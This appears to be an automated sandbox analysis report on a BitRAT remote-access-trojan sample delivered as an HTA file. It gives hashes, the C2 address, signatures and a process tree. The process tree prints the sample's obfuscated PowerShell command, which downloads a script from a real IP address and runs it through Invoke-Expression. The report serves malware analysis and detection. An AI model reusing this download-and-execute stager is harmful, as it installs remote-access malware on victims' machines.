135.148.74.241_HCrypt.zip

General
Target

135.148.74.241_HCrypt/PS1.hta

Filesize

3KB

Completed

20-01-2022 14:34

Score
10/10
MD5

37f9dc388fedc16b308acaadc34c2054

SHA1

25c936c0b399b82ad39363f6237fd5db13369bda

SHA256

f30cba9be2a7cf581939e7e7b958d5e0554265a685b3473947bf2c26679995d3

Malware Config

Extracted

Language ps1
Deobfuscated
URLs
exe.dropper

http://135.148.74.241/PS1_B.txt

Extracted

Family bitrat
Version 1.38
C2

135.148.74.241:8080

Attributes
communication_password
f1c1592588411002af340cbaedd6fc33
tor_process
tor
Signatures 14

Filter: none

Defense Evasion
Discovery
Persistence
  • BitRAT

    Description

    BitRAT is a remote access tool written in C++ and uses leaked source code from other families.

  • suricata: ET MALWARE Observed Malicious SSL Cert (BitRAT CnC)

    Description

    suricata: ET MALWARE Observed Malicious SSL Cert (BitRAT CnC)

    Tags

  • Blocklisted process makes network request
    powershell.exe

    Reported IOCs

    flowpidprocess
    233744powershell.exe
    453744powershell.exe
  • Sets service image path in registry

    TTPs

    Registry Run Keys / Startup FolderModify Registry
  • UPX packed file

    Description

    Detects executables packed with UPX/modified UPX open source packer.

    Tags

    Reported IOCs

    resourceyara_rule
    behavioral2/memory/1408-146-0x0000000000400000-0x00000000007E4000-memory.dmpupx
    behavioral2/memory/1408-147-0x0000000000400000-0x00000000007E4000-memory.dmpupx
    behavioral2/memory/1408-149-0x0000000000400000-0x00000000007E4000-memory.dmpupx
  • Checks computer location settings
    mshta.exe

    Description

    Looks up country code configured in the registry, likely geofence.

    TTPs

    Query RegistrySystem Information Discovery

    Reported IOCs

    descriptioniocprocess
    Key value queried\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nationmshta.exe
  • Suspicious use of NtSetInformationThreadHideFromDebugger
    aspnet_compiler.exe

    Reported IOCs

    pidprocess
    1408aspnet_compiler.exe
    1408aspnet_compiler.exe
    1408aspnet_compiler.exe
    1408aspnet_compiler.exe
    1408aspnet_compiler.exe
  • Suspicious use of SetThreadContext
    powershell.exe

    Reported IOCs

    descriptionpidprocesstarget process
    PID 3744 set thread context of 14083744powershell.exeaspnet_compiler.exe
  • Enumerates physical storage devices

    Description

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

    TTPs

    System Information Discovery
  • Modifies data under HKEY_USERS
    WaaSMedicAgent.exe

    Reported IOCs

    descriptioniocprocess
    Key created\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CertificatesWaaSMedicAgent.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLsWaaSMedicAgent.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLsWaaSMedicAgent.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\RootWaaSMedicAgent.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLsWaaSMedicAgent.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeopleWaaSMedicAgent.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLsWaaSMedicAgent.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CAWaaSMedicAgent.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLsWaaSMedicAgent.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CertificatesWaaSMedicAgent.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CertificatesWaaSMedicAgent.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLsWaaSMedicAgent.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRootWaaSMedicAgent.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trustWaaSMedicAgent.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLsWaaSMedicAgent.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLsWaaSMedicAgent.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CertificatesWaaSMedicAgent.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CertificatesWaaSMedicAgent.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeopleWaaSMedicAgent.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software PublishingWaaSMedicAgent.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CAWaaSMedicAgent.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLsWaaSMedicAgent.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLsWaaSMedicAgent.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLsWaaSMedicAgent.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CertificatesWaaSMedicAgent.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLsWaaSMedicAgent.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLsWaaSMedicAgent.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CertificatesWaaSMedicAgent.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trustWaaSMedicAgent.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CertificatesWaaSMedicAgent.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\DisallowedWaaSMedicAgent.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\DisallowedWaaSMedicAgent.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLsWaaSMedicAgent.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLsWaaSMedicAgent.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CertificatesWaaSMedicAgent.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLsWaaSMedicAgent.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLsWaaSMedicAgent.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLsWaaSMedicAgent.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CertificatesWaaSMedicAgent.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLsWaaSMedicAgent.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLsWaaSMedicAgent.exe
  • Suspicious behavior: EnumeratesProcesses
    powershell.exe

    Reported IOCs

    pidprocess
    3744powershell.exe
    3744powershell.exe
  • Suspicious use of AdjustPrivilegeToken
    powershell.exeaspnet_compiler.exe

    Reported IOCs

    descriptionpidprocess
    Token: SeDebugPrivilege3744powershell.exe
    Token: SeShutdownPrivilege1408aspnet_compiler.exe
  • Suspicious use of SetWindowsHookEx
    aspnet_compiler.exe

    Reported IOCs

    pidprocess
    1408aspnet_compiler.exe
    1408aspnet_compiler.exe
  • Suspicious use of WriteProcessMemory
    mshta.exepowershell.exe

    Reported IOCs

    descriptionpidprocesstarget process
    PID 3432 wrote to memory of 37443432mshta.exepowershell.exe
    PID 3432 wrote to memory of 37443432mshta.exepowershell.exe
    PID 3432 wrote to memory of 37443432mshta.exepowershell.exe
    PID 3744 wrote to memory of 14083744powershell.exeaspnet_compiler.exe
    PID 3744 wrote to memory of 14083744powershell.exeaspnet_compiler.exe
    PID 3744 wrote to memory of 14083744powershell.exeaspnet_compiler.exe
    PID 3744 wrote to memory of 14083744powershell.exeaspnet_compiler.exe
    PID 3744 wrote to memory of 14083744powershell.exeaspnet_compiler.exe
    PID 3744 wrote to memory of 14083744powershell.exeaspnet_compiler.exe
    PID 3744 wrote to memory of 14083744powershell.exeaspnet_compiler.exe
Processes 5
  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\135.148.74.241_HCrypt\PS1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    Checks computer location settings
    Suspicious use of WriteProcessMemory
    PID:3432
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $Hx = 'http://135.148.74.241/PS1_B.txt';$HB=('{2}{0}{1}' -f'---------l---------o---------a---------d---------'.RePlace('---------',''),'**********s**********t**********r**********i**********n**********g**********'.RePlace('**********',''),'sss+Dsss+osss+wsss+nsss+'.RePlace('sss+',''));$HBB=('{2}{0}{1}' -f'---------e---------B---------c---------l---------'.RePlace('---------',''),'---------i---------e---------n---------t---------'.RePlace('---------',''),'---------Ne---------t---------.W---------'.RePlace('---------',''));$HBBB=('{2}{0}{1}' -f'------w-o------B------j------e------c------t $------H------'.RePlace('------',''),'------BB------).$H------B(------$H------x)------'.RePlace('------',''),'------I------`e------`X(------Ne------'.RePlace('------',''));$HBBBBB = ($HBBB -Join '')|InVoke-exPressioN
      Blocklisted process makes network request
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3744
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        PID:1408
  • C:\Windows\System32\WaaSMedicAgent.exe
    C:\Windows\System32\WaaSMedicAgent.exe aed221520e0f14fb3027394fae42bfb3 C25sboTFCk+5gsrP8JQ7OQ.0.1.0.0.0
    Modifies data under HKEY_USERS
    PID:3944
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p
    PID:2684
Network
MITRE ATT&CK Matrix
Collection
    Command and Control
      Credential Access
        Defense Evasion
        Execution
          Exfiltration
            Impact
              Initial Access
                Lateral Movement
                  Privilege Escalation
                    Replay Monitor
                    00:00 00:00
                    Downloads
                    • memory/1408-149-0x0000000000400000-0x00000000007E4000-memory.dmp

                    • memory/1408-147-0x0000000000400000-0x00000000007E4000-memory.dmp

                    • memory/1408-146-0x0000000000400000-0x00000000007E4000-memory.dmp

                    • memory/3744-140-0x00000000068C5000-0x00000000068C7000-memory.dmp

                    • memory/3744-136-0x0000000006CB0000-0x0000000006CD2000-memory.dmp

                    • memory/3744-137-0x0000000006E80000-0x0000000006EE6000-memory.dmp

                    • memory/3744-138-0x0000000007530000-0x0000000007596000-memory.dmp

                    • memory/3744-139-0x0000000007A00000-0x0000000007A1E000-memory.dmp

                    • memory/3744-135-0x00000000068C2000-0x00000000068C3000-memory.dmp

                    • memory/3744-141-0x00000000091B0000-0x000000000982A000-memory.dmp

                    • memory/3744-142-0x00000000080A0000-0x00000000080BA000-memory.dmp

                    • memory/3744-143-0x0000000009010000-0x00000000090A6000-memory.dmp

                    • memory/3744-144-0x0000000008FA0000-0x0000000008FC2000-memory.dmp

                    • memory/3744-145-0x0000000009DE0000-0x000000000A384000-memory.dmp

                    • memory/3744-134-0x0000000006F00000-0x0000000007528000-memory.dmp

                    • memory/3744-133-0x00000000068C0000-0x00000000068C1000-memory.dmp

                    • memory/3744-132-0x0000000004250000-0x0000000004286000-memory.dmp